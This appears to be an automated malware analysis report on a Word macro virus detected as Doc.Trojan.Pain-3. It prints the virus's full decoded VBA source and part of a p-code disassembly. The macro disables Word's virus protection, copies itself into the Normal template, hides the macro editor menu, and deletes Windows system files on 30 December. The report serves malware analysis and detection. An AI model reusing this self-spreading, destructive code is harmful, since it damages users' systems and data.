Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 47c545a2d1c62659…

MALICIOUS

Office (OLE)

27.0 KB Created: 2001-08-07 14:10:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6df3b44686ec8508988d61b5cfeb2b61 SHA-1: 39125633759904e12c190d12d65cc1cd491421fc SHA-256: 47c545a2d1c62659e96138d4245b7943b964f255837dba44a33cf79be47e2864
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a legacy WordBasic AutoClose macro, identified by the 'OLE_LEGACY_WORDBASIC_AUTOEXEC' and 'OLE_VBA_AUTOCLOSE' heuristics. The AutoClose subroutine attempts to delete files from C:\Windows\System\*.* and C:\Windows\*.*, indicating a destructive or cleanup action, potentially after a payload has been executed. The ClamAV detection 'Doc.Trojan.Pain-3' further supports its malicious nature. The macro also manipulates document properties and attempts to modify the Normal template, suggesting an effort to maintain persistence or hide its actions.

Heuristics 4

  • ClamAV: Doc.Trojan.Pain-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pain-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5280 bytes
SHA-256: 153f82dead3ff3974520eee6db00e85f60c142b5f7fd835d967881a862c3c802
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub AutoClose()
On Error Resume Next
S = ActiveDocument.Saved
DisableAutoMacro = False
Text = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Countoflines)
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Left(Date, 5) = "30.12" Then Kill ("C:\Windows\System\*.*"): Kill ("C:\Windows\*.*")
Set Mac = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then
Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
For Each Control In CommandBars("Menu Bar").Controls(6).Controls
If Control.Type = 10 Then
For I = 1 To Control.Controls.Count
If Right(Control.Controls(I).Caption, 5) = "Basic" Then Control.Delete
Next I
End If
Next Control
End If
Set Mac = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
With Dialogs(wdDialogFileSummaryInfo): .Keywords = "Word97-2k.Macro.PAIN": .Execute: End With
If ActiveDocument.Path <> "" Then ActiveDocument.Save
ActiveDocument.Saved = S
End Sub



' Processing file: /opt/analyzer/scan_staging/66f3077d62d548e1a1713ba85a75fa52.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2828 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub AutoClose())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St S 
' Line #4:
' 	LitVarSpecial (False)
' 	St DisableAutoMacro 
' Line #5:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd Countoflines 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St Then 
' Line #6:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #7:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0000 
' 	EndWith 
' Line #8:
' 	Ld Date 
' 	LitDI2 0x0005 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0005 "30.12"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0015 "C:\Windows\System\*.*"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	BoS 0x0000 
' 	LitStr 0x000E "C:\Windows\*.*"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set Mac 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Then 
' 	Ne 
' 	IfBlock 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld Then 
' 	Ld Mac 
' 	ArgsMemCall AddfromString 0x0001 
' Line #12:
' 	StartForVariable 
' 	Ld Control 
' 	EndForVariable 
' 	LitDI2 0x0006 
' 	LitStr 0x0008 "Menu Bar"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemLd Controls 
' 	ForEach 
' Line #13:
' 	Ld Control 
' 	MemLd TypeOf 
' 	LitDI2 0x000A 
' 	Eq 
' 	IfBlock 
' Line #14:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Control 
' 	MemLd Controls 
' 	MemLd Count 
' 	For 
' Line #15:
' 	Ld I 
' 	Ld Control 
' 	ArgsMemLd Controls 0x0001 
' 	MemLd Caption 
' 	LitDI2 0x0005 
' 	ArgsLd Right 0x0002 
' 	LitStr 0x0005 "Basic"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld Control 
' 	ArgsMemCall Delete 0x0000 
' 	EndIf 
' Line #16:
' 	StartForVariable 
... (truncated)